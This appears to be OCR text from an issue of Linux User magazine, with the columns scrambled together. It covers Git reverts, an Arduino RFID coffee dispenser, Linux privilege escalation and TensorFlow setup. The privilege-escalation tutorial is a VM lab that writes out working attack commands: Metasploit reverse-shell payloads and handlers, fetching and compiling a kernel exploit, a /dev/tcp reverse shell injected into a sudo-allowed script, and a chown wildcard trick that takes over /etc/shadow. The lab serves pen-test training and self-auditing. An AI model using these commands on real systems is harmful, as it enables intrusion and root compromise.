Right Merge conflicts main character from 20 to 17. Inside the first local copy
can be tricky to deal of the repository, open the file novel.txt in a text editor,
with, but Git makes and modify the word twenty-one on line 48 so that it
handling the process says eighteen instead.
as streamlined Let’s push these changes to the online repository.
as possible Start off by running the following command:

38
to handle the merge: Git cannot decide itself what the
Figure 2
best course of action is, so you should. You might want
to choose one or the other of the two passages, or you
could decide to incorporate changes from both – perhaps
by using the more modern introduction, but changing
the word ‘teenage’ to ‘17-year-old’. When you’ve finished
making your changes, save and close the file, and then
run a git commit command to commit the changes,
followed by git push -u origin master to push them
to the repository online.
Note that if we go back to the first local repository and
run git pull, Git will now fetch the new, merged version
from the server, and will not register a merge conflict,
even though the current contents of the branch conflict
with what is online. The reason is that the online branch
is now a ‘commit ahead’ of this local branch – that is, it’s
considered to be a more up-to-date version of what’s in
our first local branch.
Author: johngowers <[email protected]> Above Git has its
Using Git to undo changes Date: Wed Mar 21 19:49:46 2018 +0000 own special format
Now suppose that we wake up the next day and realise for displaying merge
that the new ‘modern’ opening paragraph doesn’t really Resolved merge conflict. conflicts concisely
within files. Some
The long hexadecimal code identifies this merge conflict. editors, such as Atom,
Sometimes when we In order to produce the commit that reverts it, we run the can recognise this,
following command – replace the hex code with the one and make it easy to
are working on a project corresponding to the merge conflict in your setup: choose one branch
or another
we end up making changes $ git revert -m 1
2e68c483abe7db1cd87627ed2092cd24b085f0e0
that we decide we don’t
Here, the -m 1 is specific to reverting a merge conflict
want (rather than some other commit). The number 1 refers
to which of the two conflicting branches should be
considered the main one. Git will pop up a text editor,
fit in with the rest of the novel. We want to return to a where we write our revert message, before saving and
previous version of the project. To do this, we should first exiting to trigger the reversion. Now, it’s time to revert the
run the following command. other two changes. We can do this with:

$ git log git revert <first-commit-code> <second-


commit-code>
This command opens an instance of the less text viewer,
containing logging information about every commit that where we replace <first-commit-code> with the
has been made. You use the arrow keys to navigate up hexadecimal code corresponding to the commit that
and down, and can press Q when you have finished changed the first paragraph, and replace <second-
reading. We want to revert the commits, which means commit-code> with the hexadecimal code corresponding
creating a new commit that does precisely the opposite to the commit that changed Emma’s age to 17. Save and
of what that commit did: if we added some text, then close the text file as before to create a new commit to
reverting the commit will produce a new commit that revert these changes. We can now run git push -u
removes that text, and vice versa. origin master to push the revert to the online version.
We want to revert the last three commits that were If we go into our second local copy and run git pull,
made to the repository: the merge conflict and the two that branch will be up-to-date as well. If we want to undo
‘improvements’ from the two different authors. We’ll start changes that we haven’t committed, we have a couple of
with the merge conflict. In the output from git log, this options. We can either run
is displayed in the following form.
$ git reset --hard <hash-code>
commit
2e68c483abe7db1cd87627ed2092cd24b085f0e0 (HEAD- where <hash-code> is the hexadecimal code for the
> master, origin/master, origin/HEAD) last commit that we want to return to, or we can run the
Merge: 22bff53 f9a7218 command git stash – of which more next issue…

www.linuxuser.co.uk 39
Tutorial Arduino: Coffee Dispenser

part one

Arduino: Build your own


coffee pod dispenser
Bring Arduino into the workplace and set up an (almost)
Alexander
Smith automated and cash-free coffee club using RFID cards
Arduinos aren’t just for fun and games – sometimes and let them select which flavour of coffee pod they
is a computational there’s a need for them in your professional life too. want. In the next issue we’ll cover the manufacturing of
physicist. He They could be used for taking measurements in a lab, a frame, using motors to release the coffee and checking
teaches Arduino as props in presentations, or – more importantly – for if a pod was actually dispensed.
to grad students dispensing coffee in the office kitchen. If you happen
and discourages to work for a company that doesn’t provide staff with Use RFID
people from doing coffee, you’re likely to have come across a ‘coffee club’ or Radio-frequency identification, or RFID, is a relatively new
lab work manually. an honesty jar where people pay the asked amount for a technology which has found widespread use in systems
scoop or pod of coffee. While this is a good system and, including Oyster cards, staff access cards and even
Resources generally speaking, works well, there are obvious benefits credit cards. Each card contains an antenna, circuitry
which automation can bring: no longer any need to carry and a data storage unit, at the minimum. By flashing
Arduino Mega small change, the ability to monitor coffee supplies, and your RFID card over a reader, a system can power-up
to determine which flavours are popular. the card and begin to communicate, extracting the data,
RFID Kit So in this two-part tutorial we’re going to create a identifying the user and then performing a desired action
(MF522-AN) machine which dispenses coffee pods after someone – such as opening a door or billing a bank account.
has signed in and paid using a company RFID card. Users One of the most widely used brands is Mifare, owned
Soldering iron will not need to type in a username and a password, by NXP Semiconductors. Over 10 billion RFID cards and
and the money can be paid in advance to the coffee club 260 million card readers have been issued by it and are
Raspberry Pi manager. The machine will display their account balance used in the London Underground, as disposable tickets
(or other computer)

Python

40
for the FIFA World Cup, and in universities worldwide.
However, the encryption provided by some of these
cards – Crypto-1 – has been compromised, so cards
such as the Mifare Classic have fallen out of favour in
applications where security matters. Despite this, there
are quite a few still in use, and cards and reader kits that
can easily be used with an Arduino or Raspberry Pi can be
picked up online for a few pounds. Regardless of the card
your workplace uses, you can still read card IDs without
needing to decrypt the data.

Solder pins to the reader


The low-cost RFID kits are delivered to you as a blank
RFID card, a key fob, reader module and (hopefully) a pin
strip. The reader panel contains the RFID communication
circuit, as well as circuits and a chip to handle power
and information transfer. In this tutorial we’re using the
MF522-AN module. There will be a small set of eight
holes positioned linearly along the bottom of the card. Above Card reader kits can be purchased cheaply online, and work with a variety of cards
These holes need to connect to the Arduino in order for
you to begin using the reader. In previous tutorials, we’ve For this tutorial, we’re going to use the Arduino Mega,
shied away from soldering where possible; however, in which has the SPI interface on pins 50 to 53. On the Uno
this instance, it is essential that you have access to a the pins are 10 to 13. On the Leonardo and Micro, you
soldering iron and some solder, and that you solder the have to use the ICSP header pins instead, which stand in
connector pins to the RFID reader. the middle of almost all Arduino boards. For the Arduino
Begin by turning on the soldering iron and letting it Mega, pin 50 is MISO, pin 51 is MOSI, pin 52 is SCK, pin 53
heat up. Meanwhile, thread the connector pins through is SS (although in principle any digital pin could be used).
the holes in the RFID reader – you want the long ends These pins are clearly marked on the RFID card reader –
to go into the Arduino and the short ends to go through although SS will be labelled SDA – and should connect to
the reader. When it’s at the desired temperature, put the corresponding pin on your Arduino. There should also
the soldering iron in contact with the metal on the pin – be ground and 3.3V pins on the reader, which should be
not the hole – and gently press the solder into the gap connected to the equivalent Arduino pins. There will also
between the pin and the hole. It should melt and form a be a reset pin on the reader which needs to go to a digital
continuous surface, surrounding and contacting the pin
and the hole. If so, the connection has been formed and
you can move on to the rest of the pins. For those new to Over 10 billion RFID
soldering, remember to use a well-ventilated room, wash
your hands afterwards, don’t burn yourself and don’t cards and 260 million card Encrypt
breathe in any lead-based solder fumes – if you have a blank cards
desk fan, use it to blow the fumes away from you. readers have been issued If you decide it’s
worth issuing
Connect through SPI new RFID cards
Using a set of jumper wires, connect the pins on the RFID pin and, depending on your model, possibly an IRQ pin to members
reader to the Arduino. You’re going to be using the serial which can be left disconnected. of the coffee
peripheral interface (SPI) for the reader. This enables The RFID reader uses a 3.3V power supply, not a 5V club, it’s worth
quick communication between two microcontrollers – supply; using a higher voltage could be damaging for considering using
the Arduino and the reader – but can only be performed the reader. For correct connection to the Arduino, the the data storage
using a certain group of digital pins, so it’s important to remaining digital lines should also be running 3.3V. blocks to store
ensure these pins are connected to the reader. They’re However, in this instance, it appears 5V on these lines your own user
not always in the same positions between different (non-power) doesn’t harm functionality. Strictly speaking, ID and adding
boards. With SPI there is a master device (in this case the you should be using a level-shifter to reduce all 5V encryption.
Arduino) which tells other devices (the reader) that it is Arduino outputs to 3.3V (and increasing 3.3V to 5V for the Even if it can be
the slave through the SS (slave select) pin. There are then reader outputs). These can also be picked up cheaply cracked, it makes
two communication lines: MOSI (master out, slave in) online, but we won’t be using them in this tutorial. it harder to clone
and MISO (master in, slave out); and another, SCK (serial the cards and
clock), to handle timing. When a device is told to go into Program your Arduino gives you space
slave mode, it begins to listen to the MOSI line and will Now that the RFID reader is connected, you can quickly to store or even
respond using MISO. This allows several devices to share start reading data from certain RFID cards, including backup account
the same communication lines, only listening when they the Mifare Classic. To begin, you need to download the information.
are told to do so by the master. MFRC522 library. This can be done through the Arduino

www.linuxuser.co.uk 41
Tutorial Arduino: Coffee Dispenser

IDE under Sketch > Include library > Manage libraries. the card holder. With the Mifare Classic series of cards,
Using Search for ‘MFRC522’ and press Install; you can also do the data stored takes the format of header information,
Python this in the online editor using the Library Manager. followed by blocks of data, which in some cases can be
databases Open the example sketch ‘DumpInfo’ that comes with encrypted. If you plan to issue users with your own cards,
There are Python the library. This will be the skeleton around which you will you can make use of the other example sketches to write
libraries which write the sketch for the coffee pod dispenser. The sketch data to certain blocks on the card. You can encrypt them
enable you to begins by including the SPI and MFRC22 libraries and using the Crypto-1 algorithm built-in to the cards and
interface with defining the reset (RST_PIN) and slave select (SS_PIN) the Arduino library – although, as mentioned earlier, this
and manage pins. Modify the top of the sketch to match your setup; provides little security and is no longer used on newer
databases. don’t worry about the rest of the SPI pins – we’ve used Mifare card models.
These libraries the default configuration. The sketch then goes on to If you intend to use employee identification cards
act as drivers initialise an MFRC522 object using: for this system, as we will demonstrate, it will be much
for databases harder (and perhaps a bad idea) to write to blocks on
such as SQLite, MFRC522 mfrc522(SS_PIN, RST_PIN); the card. For one thing, you definitely don’t want to do
PostgreSQL and be overwriting information already present on the card
MySQL, and can and, in setup, begins connection to the RFID reader and – your employer might be a bit peeved if they catch you
therefore be requests information about the reader. In loop there are
manipulated in then two if conditions which return the program to the
a Python script. beginning of loop unless a new card is placed in front In order for the user to
This is a good of the reader, and the reader can establish a connection
route if a web with the card and read data from it. If data is read, the order a coffee, they’ll need
application is sketch finishes by executing:
suitable for to flash their RFID card in
managing your mfrc522.PICC_DumpToSerial(&(mfrc522.uid));
coffee club front of the reader
and letting new writing all card data to serial (your computer) and
users register. automatically terminating connection with the card.
Open the Serial Monitor from the Arduino IDE and ‘tampering’ with it! An easy way around this, although
scan a card in front of the reader – you can use the one not without its drawbacks, is to just read the unique
provided with the kit and then consider trying others. It identifier (UID) written to the card by the manufacturer.
should begin with a unique identifier, the card model, While this is a quick and dirty way of identifying the user,
and then lots of text, broken into blocks. This is the card it’s a bad idea if you care about security: it is possible to
data which can be used to store data, such as employee clone these cards and overwrite the UID field. In principle,
number or account balance. If your Arduino says that anyone could pretend to be someone else (if they know
authentication failed, your card is encrypted. a UID for members of your coffee club) and get a free
coffee from your machine – so that’d be no better than
Below Use a Identify the card an honesty jar.
breadboard to make In order for the user to order a coffee, they’ll need to However, if you’re reasonably confident that
wiring the RFID reader flash their RFID card in front of the reader, from which we employees’ cards will be protected by the user and
to the Arduino easier can extract information about the card – and therefore not left lying around, just grabbing the UID should be
sufficient. If you are still worried, you could always get
the user to input a PIN code before issuing a pod and
charging their account. Luckily for us, the MFRC522
object stores the UID separately as a byte array, so
we can access it using mfrc522.uid.uidByte – and
similarly for the size. If you would prefer the card ID in
hexadecimal, open the ReadNUID example and steal the
printHex function from the bottom. You can then call:

printHex(mfrc522.uid.uidByte, mfrc522.uid.size);

passing the byte array and its length to the function


printHex. This function calls Serial.print to write the
UID over serial – in this case, over USB to the connected
computer. That’s all that’s needed to identify a user,
and all the Arduino needs to do until we move on to
processing orders and dispensing the coffee.
Now that there’s a steady stream of card IDs being
transmitted from the Arduino, it’s time to bring a
computer into the mix so that we can determine whether

42
or not coffee should be served to a user. The aim of the
rest of this tutorial is to establish whether or not a user
is a member of the club, if they have enough money
associated with their ID, and then, if the user orders a
coffee, to subtract a preset amount of money after the
pod has been dispensed. Instinctively, one might consider
using a database to manage users and their accounts,
and languages such as Python – which, as we’ve seen
in previous tutorials, can also be used to communicate
easily with the Arduino – have ways of doing this. Python
can even be integrated with a MySQL database, which
enables us to create a website where a user or manager
can manage an account. If this is something that
interests you, we recommend you go for it, but it’s a little
outside the scope of this tutorial.
Connect a Raspberry Pi to the Arduino Mega by USB;
an adaptor might be required to convert to Micro-USB. On
the Pi Zero W, we use the adaptor to connect to the USB
terminal, and power both the Raspberry Pi and Arduino
through the Pi’s Power USB port. We chose the Pi Zero W
as it’s low-cost and has built-in Wi-Fi, thus enabling us to When a user swipes their card in front of the reader, Above Connecting
log in remotely. the Pi receives a UID as a string. The Pi can then hash the the Arduino to the Pi
UID and check the Python dictionary to see if that string may require a USB
Check against known users exists. If the ID doesn’t exist, the script can then create a adaptor, depending
We can now begin creating our pseudo-database of file, using the hashed ID as the filename, which the user on the model
coffee club members and adding money to accounts. can then manually open to enter their name.
As stated before, this isn’t the most effective way of Each time the Pi boots up, it can form the dictionary
managing the club, but all we now need to do is to create from this folder of hashed UIDs, mapping the UID to the
a dedicated folder where we can store user accounts. contents of its file – the name of the card holder. If a
Each time an RFID card is swiped against the reader, the hashed UID is found to already exist in the dictionary, the
script can use the mapping to convert to a username,
open their account file – created when the user registers
When the Pi boots up, it – and find out how much money they have in their
account. If they have money on their account, the Pi can
can form a dictionary from tell the Arduino to dispense a coffee pod.

a folder of hashed UIDs Await input, give feedback


Once the Pi has determined that the user exists and
has determined how much money is in their account,
Pi can take note of the card details by creating a new file the Arduino also needs to be informed, so that it knows
with the UID of the card as a filename, and entering a whether or not it’s okay to dispense a coffee. If you
default amount of money: zero. To read the message sent want to go a bit further and let the user know how much
over serial, you can open a Python script and initialise a money is in their account, the Pi could send the account
connection with the Arduino by specifying the port: balance over serial and back to the Arduino, which could
then display the amount of money the user has left on an
arduino = serial.Serial(port) attached LCD.
All that’s left to do is to wire up a button or two – as
and then you can read incoming messages and store we have done countless times before – so the user can
them as strings, using pick a flavour and agree to the sale of the coffee pod.
There’s no need to add an interrupt to do this; most of
msg = arduino.readline().decode("utf-8") the program (on both machines) will involve waiting for a
message to be sent or received.
For the more security-conscious, using the UIDs as The Arduino sends the UID, the Pi sends the balance,
filenames might like seem a bad idea – at the very least, the Arduino sends the coffee selection, the Pi subtracts
we should be hashing them. It’s also going to be difficult the amount and says okay. There is still some work to
to manually top-up an account without having another be done handling errors, and perhaps implementing a
card reader and an Arduino sitting next to the manager’s time-out, but you should now be in a good position to
computer to work out who owns each card. Instead, we start designing the physical machine and considering the
can exploit Python’s dictionaries to link human-readable mechanics of dispensing pods of coffee. We’ll get onto
filenames with matching hashed UIDs. those topics, and a few more, in the next issue.

www.linuxuser.co.uk 43
Tutorial Computer Security

Security: Privilege
escalation techniques
Learn how attackers may gain root access by exploiting
Toni
Castillo misconfigured services, kernel bugs and more
Girona So far our tutorials in this series have been dealing and sometimes they may even crash it. Without further
with different techniques to find and exploit well- ado, are you ready to delve into the passionate world of
Toni holds known vulnerabilities in order to get a foothold into a privilege escalation techniques? Read on!
a degree in system. Most of the time, however, that initial foothold
Software won’t get you a root shell. That’s because some of these Get root through Ring 0
Engineering and a services may run using a non-privileged user account We’ve already mentioned that getting root by exploiting
MSc in Computer (for example, Apache’s ‘www-data’ user). As a pen-tester, a kernel flaw is dangerous, so now it’s time for a
Security and your next step is obvious: to escalate privileges, or priv demonstration. Download Ubuntu 16.04-4 LTS from
works as an ICT esc. To some, priv esc is kind of an art, and we agree. http://releases.ubuntu.com and install it on a VM
research support Whatever your thoughts about it, priv esc can be achieved with at least two CPUs. Add a new ‘Host Only’ network
expert in a public by abusing misconfigured services, exploiting vulnerable device to be able to communicate with the VM directly
university in programs, taking advantage of kernel bugs, or performing (for VirtualBox, see http://bit.ly/lud_vb). Don’t tick the
Catalonia (Spain). social engineering attacks. There are some tools that ‘Download updates while installing Ubuntu’ option. Boot
Read his blog at will assist you throughout this process (see Resources). it up and install a vulnerable kernel: apt-get install
http://disbauxes. Metasploit framework, for instance, ships with a bunch linux-image-4.4.0-62-generic. This kernel version is
upc.es of local exploits for some well-known vulnerable known to have a ‘Use-After-Free’ flaw (see http://bit.
programs (see modules/exploits/linux/local). ly/lud_flaw). Now reboot into this new kernel – press
Resources Sometimes it’s tempting to execute a local kernel exploit Shift during the booting process to access the GRUB
to get root, but we strongly discourage you to do so menu. Don’t install any updates. If you were an attacker
Post exploitation because these exploits tend to make the system unstable already connected to this machine as a non-privileged
repository
http://bit.ly/
lud_postexp

Metasploit local
exploit suggester
http://bit.ly/
lud_suggest

LinEnum
http://bit.ly/
lud_linenum

Linux exploit
suggester
http://bit.ly/
lud_suggest2

Exploit database
http://bit.ly/
lud_exploit

Vulners scanner
http://bit.ly/
lud_vulners

Lynis
https://cisofy.com Above Get used to auditing your own computers before someone else does (uninvited, that is!)

44
user, you would be looking for possible priv esc vectors. Left Identifying priv
Figure 1
You will be that attacker now; install Metasploit on your esc vectors won’t
computer (see http://bit.ly/lud_nightly) and generate a always be that easy –
Meterpreter payload for Linux x64: msfvenom -p linux/ and that’s a relief
x64/meterpreter_reverse_tcp LHOST=<YOURIP>
LPORT=4444 -f elf -o m.e. Upload this file to your
VM, using SSH for example, set its execute bit and run
it: chmod +x m.e; ./m.e&. On your computer, start
msfconsole with a new handler to deal with remote
sessions by typing this one-liner:

msfconsole -qx "use exploits/multi/handler; \


set PAYLOAD linux/x64/meterpreter_reverse_tcp;
\
set LHOST <YOURIP>; set LPORT 4444; \
set ExitOnSession false; run -j"

After a little while, a new session will be established.


Interact with it: sessions -i 1. So far, you, the attacker,
have set a foothold into this computer. Next, you proceed
by getting its kernel version and the release number of ./linux-exploit-suggester.sh -u "<uname -a
output>" Tutorial files
available:
You can use Linux Feel free to try other kernel exploits; some of them are filesilo.co.uk
more reliable. You can use Linux Suggester directly
Suggester on your own on your own computers to determine if they may be
vulnerable. If they are, get patching!
computers to determine Using
Get root through local exploits Metasploit
if they may be vulnerable Dealing with local kernel exploits is a perilous business, for post
so looking for vulnerable software packages already exploitation
installed on the target system is a much better (and Metasploit
its installed distribution; spawn a new shell from your safer) approach. Reboot your VM and let it boot into includes a bunch
meterpreter session first: shell. Then execute uname its default kernel version. Then downgrade the ntfs-3g of useful post
-r; lsb_release -a. On your computer, clone the package: apt-get install ntfs-3g=1:2015.3.14AR.1- exploitation
exploit database repository (see Resources) and look for 1build1. Now re-run the meterpreter payload to establish modules.
possible kernel exploits, excluding DoS and PoCs: a new session back to the attacker (that is, you): /m.e&. Some of these
Interact with this new session using msfconsole: session will be useful
searchsploit -t "Kernel 4.4.0" -i <ID>. A good tool to determine whether there are for gathering
--exclude="PoC|/dos/" vulnerable packages installed on a computer is Vulners additional
(see Resources). From your meterpreter session, open a information if
As of this writing, there are four exploits that will give you new shell: shell. Finally, get a list of installed packages you are a non-
root. Get the DCCP Double-Free exploit: searchsploit and store the output to a file by piping its output to the privileged user,
-m 41458. Upload this file to your VM using your tee command: such as more
meterpreter session: upload 41458.c. Alternatively, credentials,
you can download it directly to the target system: wget dpkg-query -W -f='${Package} ${Version} juicy files
https://www.exploit-db.com/download/41458.c. Then ${Architecture}\n' \ and software
spawn a new shell: shell. This shell is really limited |tee packages.txt versions. Others,
in functionality, so use Python to execute a new bash on the other
process: python -c 'import pty; pty.spawn("/bin/ Terminate this channel by pressing Ctrl+C and then hand, will allow
bash")' -c. Now compile the exploit: gcc 41458.c -o download packages.txt to your computer: download you to perform
exploit. Execute it: ./exploit. The chances are that packages.txt. Now copy its contents to the clipboard, more sinister
you will see a [+] got r00t ^_^ message right before navigate to https://vulners.com/audit, choose ‘Ubuntu’ tasks once you
the system freezes – or maybe the system has already as the OS type, ‘16.04’ as the OS version and paste the become root:
crashed. Of course, there’s still the possibility to gain a clipboard contents to the text area. Press ‘Next’. Vulners MITM attacks,
root shell and be able to interact with it. Apart from using will show you two vulnerable packages: isc-dhcp-client SSH-pivoting
searchsploit, you can use Linux Exploit Suggester (see and ntfs-3g. The first package is vulnerable to a DoS and so on… see
Resources) to look for kernel exploits for a particular attack whereas the second one is affected by a priv esc http://bit.ly/
kernel version. You can even provide the tool with the vulnerability (see Figure 1). Metasploit framework ships lud_post.
output of the uname -a command this way: with a bunch of local exploits for most OSEs. You can get

www.linuxuser.co.uk 45
Tutorial Computer Security

a list of GNU/Linux local exploits by executing ls -l apache2 libapache2-mod-php. Next, create the
Privilege /opt/metasploit-framework/embedded/framework/ .scripts directory in /var/www/html with: mkdir /var/
escalation modules/exploits/linux/local/. As you can see, there’s www/html/.scripts. Add the following lines to the /etc/
in Windows a working exploit for ntfs-3g. Use this module, set its apache2/sites-available/000-default.conf file:
Eleven Paths payload (a stageless meterpreter reverse TCP payload
has developed will do), your IP and a new listening port (remember that <DirectoryMatch "^\.|\/\.">
a Python the VM is still connected to your port 4444/tcp): Order allow,deny
framework for Deny from all
attacking and use exploit/linux/local/ntfs3g_priv_esc </DirectoryMatch>
mitigating all set PAYLOAD linux/x64/meterpreter_reverse_tcp
the well-known set LHOST <YOURIP> Restart Apache: /etc/init.d/apache2 restart. Now
techniques to set LPORT 4445 create a new file called purge.sh:
bypass Windows
UAC, called Because this is a local exploit, it requires an already #!/bin/bash
Uac-A-Mola established session. Use the SESSION_ID of your current rm -rf /tmp/*
(see https:// meterpreter session: set SESSION <ID>. This module
github.com/ will upload some files to the target computer and it will Save this file to /var/www/html/.scripts/ and set its
ElevenPaths/ compile the exploit right there, so make sure you set execute bit: chmod +x purge.sh. Finally, make sure
uac-a-mola). a valid working directory with write permissions: set to set www-data as the owner of /var/www/html with:
This framework WritableDir /home/<USER>, where <USER> is the user chown -R www-data:www-data /var/www/html. Add the
implements you are logged in as. Now, before executing the exploit, following entry to /etc/sudoers: www-data ALL=(ALL)
the techniques make sure to check if the target is vulnerable: check. NOPASSWD: /var/www/html/.scripts/purge.sh. This
known to date: Finally, execute the exploit in order to get root: exploit. script will be executed by www-data at some point. No
DLL hijacking, You will see a new reverse TCP session being established one is supposed to run this command directly from
CompMgmt to your computer and msfconsole will start interacting the website, of course, thanks to the <DirectoryMatch>
Launcher.exe, directive. On your computer, kill any established
Eventvwr.exe meterpreter session: sessions -K. Then kill all your
and fodhelper. Kernel exploits tend to listeners too: jobs -K.
UAC exploitation Now, let’s imagine you are an attacker who has been
aside, the same make the system unstable able to exploit a flaw on the website and you have gained
principles as a non-privileged PHP meterpreter session. Generate
with GNU/Linux and sometimes they may a new payload now: msfvenom -p php/meterpreter/
distros apply reverse_tcp LHOST=<YOURIP> LPORT=4444 -o m.php.
here as well. even crash it Upload this file to the VM and save it to /var/www/html/.
On your computer, change the payload used by the
multi/handler listener accordingly: use exploit/multi/
with it right away. Check if you are root now: getuid handler; set PAYLOAD php/meterpreter/reverse_tcp.
(see Figure 2). You can use vulners-scanner too (see Now run the module: run -j. Use your favourite browser
Resources) and execute it directly on the target machine. to access the payload just uploaded by navigating to
You can do this from your non-privileged meterpreter http://YOURVMIP/m.php. You will get a meterpreter
session. Background your current privileged session now: session with the same privileges as www-data.
background. Get back to your previous non-privileged Interact with this session and spawn a new shell (use
meterpreter session: session -i <ID>. Now spawn a the Python trick again) to run the command sudo -l;
new shell and download vulners-scanner: wget https:// this will list the allowed sudo commands for www-data.
github.com/vulnersCom/vulners-scanner/archive/ See? You now know that you can run the purge.sh script
master.zip. Unzip it and execute it: unzip master.zip; without a password! It so happens that this script is
cd vulners-scanner-master; ./linuxScanner.py. You
will get the same list of vulnerable packages as with the Figure 2
web front-end.

Get root through sudo


Sometimes it may be a lot easier to look for
misconfigured services and poorly thought-out sudo
configurations to gain root. Trust us – we’ve seen this
a lot and sometimes root is just a mere command away!
Most sysadmins tend to configure sudo to allow non-
Right Yes, we know: privileged users to run privileged commands. Sometimes
sometimes Metasploit these commands are allowed to be executed without
makes priv esc look typing a password. For our next example, install Apache
like child’s play! and its PHP module on your VM: apt-get install

46
owned by www-data, so it’s a piece of cake to
add something more interesting than just rm
You know what wildcards are; you probably
use them on a regular basis. Most of us do. what next?
-rf to it; terminate this channel with Ctrl+C When used loosely, bad things can happen.
and use the edit command to edit this file: As a matter of fact, things can turn wild (see Dissect malicious
edit .scripts/purge.sh. Now add the http://bit.ly/lud_privesc). So let’s imagine
following lines to the file (replace <YOURIP> that a sysadmin has created the following Windows binaries
with your IP Address): shell script:
with Any.Run
/bin/bash -c /bin/bash -i > /dev/
tcp/<YOURIP>/4445 0<&1 2>&1 &
#!/bin/bash
cd /var/www/html && chown www- 1 Create your account
disown $! data:www-data *
exit $? Visit https://app.any.run/#register and
Save it (:wq!). Background this session and create a new account, with any email
start a new listener using the reverse shell Save this file to /usr/local/bin/update- address you like. Using the free plan only
payload: background; set PAYLOAD linux/ web-owners.sh on your VM. Set its execute gives you access to a Windows 7
x64/shell_reverse_tcp; set LPORT bit: chmod +x /usr/local/bin/update- 32-bit sandbox.
4445. Execute it: run -j. Now get back to web-owners.sh.
your non-privileged session: sessions -i
<ID>. Spawn a new shell (don’t forget to use Get root through wildcards
2 Upload your malicious
Python again!) and run the script via sudo: This script has been added to cron to be
binary to the sandbox
sudo /var/www/.scripts/purge.sh. A new executed every five minutes as root; add the
reverse-TCP session will be established; kill following line to /etc/crontab on your VM: Grab your malicious program and send
this channel (Ctrl+C) and background the it to the sandbox. You can use the New
current session: background. Finally, interact */5 * * * * root /usr/local/ Task icon on the left (+) to upload a local
with the new session just established: bin/update-web-owners.sh file, or you can paste an URL holding the
sessions -i <ID>. Run the id command; binary. Only files up to 16MB are allowed.
you are root now!
You can use LinEnum to help find
Get back to your computer and, from a
non-privileged meterpreter session, create 3 Let it run
security weaknesses in a system such as a new file called ref.php (don’t forget to
misconfigured files. It’s an standalone bash spawn a shell first): touch ref.php. This Wait for a while until the sandbox is
script that you can upload to your target file will be created with www-data as its ready. The system will start gathering
computer using a non-privileged session and owner, of course. Open a new terminal on some useful information about the
run it. It will check for sudo access without a your computer, execute vi and save the program: network connections, registry
password, locate setuid/setgid binaries, and new empty file (:w --reference=ref. changes, malicious behaviour, and so on.
so on (see Resources). php). Then upload this file to the VM using You are free to interact with the system
Get back to your non-privileged session, your meterpreter session (first terminate at any time.
spawn a new shell and download LinEnum. the active channel with Ctrl+C): upload
sh: cd .scripts; wget https://raw. --reference=ref.php. Spawn a new shell
githubusercontent.com/rebootuser/ once again and make a symbolic link to /etc/
LinEnum/master/LinEnum.sh. Set its execute shadow: ln -s /etc/shadow shadow. Wait
bit: chmod +x LinEnum.sh. for a while until the cron job executes. Have
Finally, run it and pipe its output to a file: a good look at /etc/shadow now… and start
panicking! Now /etc/shadow is

Vulners is a good tool to


owned by www-data, because the
special file you have uploaded to 4 Have a look at
/var/www/html/ has been other submissions
determine whether there expanded as an additional flag to
the chown command as follows: Click the Report icon on the left to get a
are vulnerable packages chown www-data:www-data list of public submissions. Pick the one
--reference=ref.php file1 you may be interested in and click its
installed on a computer file2 fileN… The --reference description; you will see a recorded video
flag uses the owner and group of of the binary’s behaviour.
./LinEnum.sh|tee r.txt. Kill this channel
now (Ctrl+C) and download the file r.txt
the file passed as a parameter as a reference
to set the owner and group of the rest of the 5 Upgrade your account
to your computer: download .scripts/r. files. Because chown follows symlinks and
txt. Have a look at it now, can you spot the apply any changes to the actual file pointed If you think it’s worth it, you can upgrade
“***Possible Sudo PWNAGE!” warning? to by the symlink, /etc/shadow is now owned your free plan. Visit https://app.any.run/
We suggest you run this script on your own by www-data instead of root. Gaining root plans and choose the one that suits you
computers as soon as possible to make sure now is a piece of cake because you can write the best (they're not available yet at the
there are no easy priv esc vectors around! to /etc/shadow! time of writing).

www.linuxuser.co.uk 47
Tutorial TensorFlow: Image Recognition

TensorFlow: Recognise and


classify images
Put the power of an open source neural network to work
Joey
Bernard with this example of a usage for deep learning
Neural networks have been around, as an idea, since In order to keep your Python enviornment organised, you
In his day job, Joey the very beginning of artificial intelligence research. should create a virtual environment where you can safely
helps researchers The problem has always been that it’s very difficult to install TensorFlow. You can do this with the following.
and students at implement them in an efficient way. This has kept these
the university techniques out of the hands of the average software virtualenv --system-site-packages -p python3
level in designing developer – at least until Google developed a library for tensorflow
and running its Google Brain internal project. This was released in
HPC projects on 2015 as an open source library called TensorFlow. In just This will create a virtual environment, in the subdirectory
supercomputing a few short years, it’s found its way into a huge number named tensorflow, where you can install TensorFlow.
clusters. of fields and projects, including convolutional neural You can activate it by sourcing the activation script.
networks, audio recognition and image recognition,
among others. source ~/tensorflow/bin/activate
Because of its popularity, TensorFlow has been ported (tensorflow)$
Resources to many different platforms – including, most recently,
mobile operating systems such as Android and iOS. In Your command line prompt should change to the new
TensorFlow this article, we’ll look at how TensorFlow can be used to one seen above. You can now install TensorFlow into the
www.tensorflow.org do image recognition and classification. We’ll look at how virtual environment with
to get it installed on your platform, and how to create
Example models a basic system setup so that you can do some image (tensorflow)$ pip3 install --upgrade
https://github.com/ processing. tensorflow
tensorflow/models
Install Tensorflow This installs the CPU version of the TensorFlow library.
The first step is to get TensorFlow installed on the However, much of the processing that it does can be
machine where you will be doing the image-analysis farmed out to a GPU for faster results. If you have an
work. For most platforms, you should be able to install it Nvidia card, you can use the following commands to
using pip. Because we only have room to talk specifically install the required CUDA support package and install the
about one platform here, I’ll assume you’re using a GPU version of TensorFlow.
Debian-based Linux distribution. Assuming this, you can
install the necessary tools with the following command: sudo apt-get install cuda-command-line-tools
source ~/tensorflow/bin/activate
sudo apt-get install python3-pip python3-dev pip3 install --upgrade tensorflow-gpu
python-virtualenv
You should verify that everything installed correctly by
running the following tiny piece of code:

import tensorflow as tf
hello_test = tf.constant('Hello from
TensorFlow!')
sess = tf.Session()
print(sess.run(hello_test))

You should get the following output.

Hello from TensorFlow!

The core concept of TensorFlow is the graph. Data is


imported into variables with some relationship between
the elements. There is also a series of processes that

48
need to be applied to the data. All these processes and hidden Left A neural network
relationships are combined to define a dataflow graph. consists of an input
